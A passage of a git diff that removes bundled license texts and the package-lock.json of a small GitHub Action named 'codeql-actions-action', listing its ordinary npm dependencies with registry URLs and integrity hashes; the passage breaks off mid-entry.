-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -uuid -MIT -The MIT License (MIT) - -Copyright (c) 2010-2020 Robert Kieffer and other contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json deleted file mode 100644 index 9cacb7f9af9c..000000000000 --- a/.github/action/package-lock.json +++ /dev/null @@ -1,639 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "codeql-actions-action", - "version": "0.1.0", - "license": "MIT", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } - }, - "node_modules/@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "node_modules/@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "dependencies": { - "@actions/io": "^1.0.1" - } - }, - "node_modules/@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "node_modules/@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "dependencies": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "node_modules/@actions/io": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "node_modules/@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "dependencies": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - } - }, - "node_modules/@actions/tool-cache/node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", - "engines": { - "node": ">=14" - } - }, - "node_modules/@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "dependencies": { - "@octokit/types": "^6.0.3" - } - }, - "node_modules/@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "dependencies": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "dependencies": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/graphql": { - "version": "4.8.0", - "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "dependencies": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "node_modules/@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "dependencies": { - "@octokit/types": "^6.40.0" - }, - "peerDependencies": { - "@octokit/core": ">=2" - } - }, - "node_modules/@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "dependencies": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - }, - "peerDependencies": { - "@octokit/core": ">=3" - } - }, - "node_modules/@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "dependencies": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "dependencies": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, - "node_modules/@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "dependencies": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "node_modules/@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "dependencies": { - "undici-types": "~5.26.4" - } - }, - "node_modules/@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true, - "bin": { - "ncc": "dist/ncc/cli.js" - } - }, - "node_modules/before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "node_modules/deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "node_modules/is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "dependencies": { - "whatwg-url": "^5.0.0" - }, - "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "node_modules/tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", - "engines": { - "node": ">=0.6.11 <=0.7.0 || >=0.7.3" - } - }, - "node_modules/typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "dependencies": { - "@fastify/busboy": "^2.0.0" - }, - "engines": { - "node": ">=14.0" - } - }, - "node_modules/undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", - "dev": true - }, - "node_modules/universal-user-agent": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", - "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" - }, - "node_modules/uuid": { - "version": "8.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", - "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", - "bin": { - "uuid": "dist/bin/uuid" - } - }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" - } - }, - "dependencies": { - "@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "requires": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "requires": { - "@actions/io": "^1.0.1" - } - }, - "@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "requires": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "requires": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "@actions/io": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "requires": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - } - } - }, - "@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" - }, - "@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "requires": { - "@octokit/types": "^6.0.3" - } - }, - "@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "requires": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "requires": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/graphql": { - "version": "4.8.0", - "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "requires": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "requires": { - "@octokit/types": "^6.40.0" - } - }, - "@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "requires": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - } - }, - "@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "requires": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "requires": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, - "@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "requires": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "requires": { - "undici-types": "~5.26.4" - } - }, - "@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true - }, - "before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" - }, - "node-fetch": { - "version": "2.7.0", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", - "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", - "requires": { - "whatwg-url": "^5.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "requires": { - "wrappy": "1" - } - }, - "prettier": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", - "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" - }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "tunnel": { - "version": "0.0.6", - "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", - "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" - }, - "typescript": { - "version": "5.3.3", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", - "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", - "dev": true - }, - "undici": { - "version": "5.28.3", - "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", - "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", - "requires": { - "@fastify/busboy": "^2.0.0" - } - }, - "undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": 